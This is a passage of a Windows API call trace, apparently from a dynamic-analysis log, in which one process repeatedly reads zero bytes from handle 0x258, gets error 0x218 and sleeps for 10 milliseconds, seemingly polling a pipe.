	[0234.828] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.828] GetLastError () returned 0x218
	[0234.828] Sleep (dwMilliseconds=0xa) 
	[0234.848] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.848] GetLastError () returned 0x218
	[0234.848] Sleep (dwMilliseconds=0xa) 
	[0234.859] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.859] GetLastError () returned 0x218
	[0234.859] Sleep (dwMilliseconds=0xa) 
	[0234.903] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.903] GetLastError () returned 0x218
	[0234.903] Sleep (dwMilliseconds=0xa) 
	[0234.947] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.947] GetLastError () returned 0x218
	[0234.947] Sleep (dwMilliseconds=0xa) 
	[0234.984] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0234.984] GetLastError () returned 0x218
	[0234.984] Sleep (dwMilliseconds=0xa) 
	[0235.030] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.030] GetLastError () returned 0x218
	[0235.030] Sleep (dwMilliseconds=0xa) 
	[0235.048] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.048] GetLastError () returned 0x218
	[0235.048] Sleep (dwMilliseconds=0xa) 
	[0235.062] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.062] GetLastError () returned 0x218
	[0235.062] Sleep (dwMilliseconds=0xa) 
	[0235.094] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.094] GetLastError () returned 0x218
	[0235.094] Sleep (dwMilliseconds=0xa) 
	[0235.109] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.109] GetLastError () returned 0x218
	[0235.109] Sleep (dwMilliseconds=0xa) 
	[0235.124] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.124] GetLastError () returned 0x218
	[0235.124] Sleep (dwMilliseconds=0xa) 
	[0235.142] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.142] GetLastError () returned 0x218
	[0235.142] Sleep (dwMilliseconds=0xa) 
	[0235.188] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.188] GetLastError () returned 0x218
	[0235.188] Sleep (dwMilliseconds=0xa) 
	[0235.267] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.267] GetLastError () returned 0x218
	[0235.267] Sleep (dwMilliseconds=0xa) 
	[0235.316] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.316] GetLastError () returned 0x218
	[0235.316] Sleep (dwMilliseconds=0xa) 
	[0235.327] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.327] GetLastError () returned 0x218
	[0235.327] Sleep (dwMilliseconds=0xa) 
	[0235.343] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.343] GetLastError () returned 0x218
	[0235.343] Sleep (dwMilliseconds=0xa) 
	[0235.359] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.359] GetLastError () returned 0x218
	[0235.359] Sleep (dwMilliseconds=0xa) 
	[0235.374] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.374] GetLastError () returned 0x218
	[0235.374] Sleep (dwMilliseconds=0xa) 
	[0235.390] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.390] GetLastError () returned 0x218
	[0235.390] Sleep (dwMilliseconds=0xa) 
	[0235.405] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.406] GetLastError () returned 0x218
	[0235.406] Sleep (dwMilliseconds=0xa) 
	[0235.421] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.421] GetLastError () returned 0x218
	[0235.421] Sleep (dwMilliseconds=0xa) 
	[0235.467] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.467] GetLastError () returned 0x218
	[0235.467] Sleep (dwMilliseconds=0xa) 
	[0235.515] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.515] GetLastError () returned 0x218
	[0235.515] Sleep (dwMilliseconds=0xa) 
	[0235.561] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.561] GetLastError () returned 0x218
	[0235.561] Sleep (dwMilliseconds=0xa) 
	[0235.577] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.577] GetLastError () returned 0x218
	[0235.577] Sleep (dwMilliseconds=0xa) 
	[0235.592] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.592] GetLastError () returned 0x218
	[0235.593] Sleep (dwMilliseconds=0xa) 
	[0235.609] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.609] GetLastError () returned 0x218
	[0235.609] Sleep (dwMilliseconds=0xa) 
	[0235.624] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0235.624] GetLastError () returned 0x218
	[0235.624] Sleep (dwMilliseconds=0xa) 
	[0236.004] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.004] GetLastError () returned 0x218
	[0236.004] Sleep (dwMilliseconds=0xa) 
	[0236.045] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.045] GetLastError () returned 0x218
	[0236.045] Sleep (dwMilliseconds=0xa) 
	[0236.095] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.095] GetLastError () returned 0x218
	[0236.095] Sleep (dwMilliseconds=0xa) 
	[0236.138] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.138] GetLastError () returned 0x218
	[0236.138] Sleep (dwMilliseconds=0xa) 
	[0236.157] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.157] GetLastError () returned 0x218
	[0236.157] Sleep (dwMilliseconds=0xa) 
	[0236.228] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.228] GetLastError () returned 0x218
	[0236.228] Sleep (dwMilliseconds=0xa) 
	[0236.268] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.268] GetLastError () returned 0x218
	[0236.268] Sleep (dwMilliseconds=0xa) 
	[0236.310] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.310] GetLastError () returned 0x218
	[0236.310] Sleep (dwMilliseconds=0xa) 
	[0236.357] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.357] GetLastError () returned 0x218
	[0236.357] Sleep (dwMilliseconds=0xa) 
	[0236.404] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.404] GetLastError () returned 0x218
	[0236.404] Sleep (dwMilliseconds=0xa) 
	[0236.419] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.419] GetLastError () returned 0x218
	[0236.419] Sleep (dwMilliseconds=0xa) 
	[0236.435] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.435] GetLastError () returned 0x218
	[0236.435] Sleep (dwMilliseconds=0xa) 
	[0236.450] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.450] GetLastError () returned 0x218
	[0236.450] Sleep (dwMilliseconds=0xa) 
	[0236.466] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.466] GetLastError () returned 0x218
	[0236.466] Sleep (dwMilliseconds=0xa) 
	[0236.483] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.483] GetLastError () returned 0x218
	[0236.483] Sleep (dwMilliseconds=0xa) 
	[0236.497] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.497] GetLastError () returned 0x218
	[0236.497] Sleep (dwMilliseconds=0xa) 
	[0236.513] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.513] GetLastError () returned 0x218
	[0236.513] Sleep (dwMilliseconds=0xa) 
	[0236.560] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.560] GetLastError () returned 0x218
	[0236.560] Sleep (dwMilliseconds=0xa) 
	[0236.606] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.606] GetLastError () returned 0x218
	[0236.606] Sleep (dwMilliseconds=0xa) 
	[0236.650] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.650] GetLastError () returned 0x218
	[0236.650] Sleep (dwMilliseconds=0xa) 
	[0236.653] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.653] GetLastError () returned 0x218
	[0236.653] Sleep (dwMilliseconds=0xa) 
	[0236.669] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.669] GetLastError () returned 0x218
	[0236.669] Sleep (dwMilliseconds=0xa) 
	[0236.685] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.685] GetLastError () returned 0x218
	[0236.685] Sleep (dwMilliseconds=0xa) 
	[0236.700] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.700] GetLastError () returned 0x218
	[0236.700] Sleep (dwMilliseconds=0xa) 
	[0236.716] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.716] GetLastError () returned 0x218
	[0236.716] Sleep (dwMilliseconds=0xa) 
	[0236.731] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.731] GetLastError () returned 0x218
	[0236.731] Sleep (dwMilliseconds=0xa) 
	[0236.747] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.747] GetLastError () returned 0x218
	[0236.747] Sleep (dwMilliseconds=0xa) 
	[0236.794] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.794] GetLastError () returned 0x218
	[0236.794] Sleep (dwMilliseconds=0xa) 
	[0236.834] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.834] GetLastError () returned 0x218
	[0236.835] Sleep (dwMilliseconds=0xa) 
	[0236.872] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.872] GetLastError () returned 0x218
	[0236.872] Sleep (dwMilliseconds=0xa) 
	[0236.920] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.920] GetLastError () returned 0x218
	[0236.920] Sleep (dwMilliseconds=0xa) 
	[0236.947] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.947] GetLastError () returned 0x218
	[0236.947] Sleep (dwMilliseconds=0xa) 
	[0236.950] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.950] GetLastError () returned 0x218
	[0236.950] Sleep (dwMilliseconds=0xa) 
	[0236.965] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.965] GetLastError () returned 0x218
	[0236.965] Sleep (dwMilliseconds=0xa) 
	[0236.982] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.982] GetLastError () returned 0x218
	[0236.982] Sleep (dwMilliseconds=0xa) 
	[0236.997] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0236.997] GetLastError () returned 0x218
	[0236.997] Sleep (dwMilliseconds=0xa) 
	[0237.030] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.030] GetLastError () returned 0x218
	[0237.030] Sleep (dwMilliseconds=0xa) 
	[0237.043] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.043] GetLastError () returned 0x218
	[0237.043] Sleep (dwMilliseconds=0xa) 
	[0237.090] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.090] GetLastError () returned 0x218
	[0237.091] Sleep (dwMilliseconds=0xa) 
	[0237.137] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.137] GetLastError () returned 0x218
	[0237.137] Sleep (dwMilliseconds=0xa) 
	[0237.200] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.200] GetLastError () returned 0x218
	[0237.200] Sleep (dwMilliseconds=0xa) 
	[0237.246] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.246] GetLastError () returned 0x218
	[0237.246] Sleep (dwMilliseconds=0xa) 
	[0237.272] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.272] GetLastError () returned 0x218
	[0237.273] Sleep (dwMilliseconds=0xa) 
	[0237.321] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.321] GetLastError () returned 0x218
	[0237.321] Sleep (dwMilliseconds=0xa) 
	[0237.324] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.324] GetLastError () returned 0x218
	[0237.324] Sleep (dwMilliseconds=0xa) 
	[0237.340] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.340] GetLastError () returned 0x218
	[0237.340] Sleep (dwMilliseconds=0xa) 
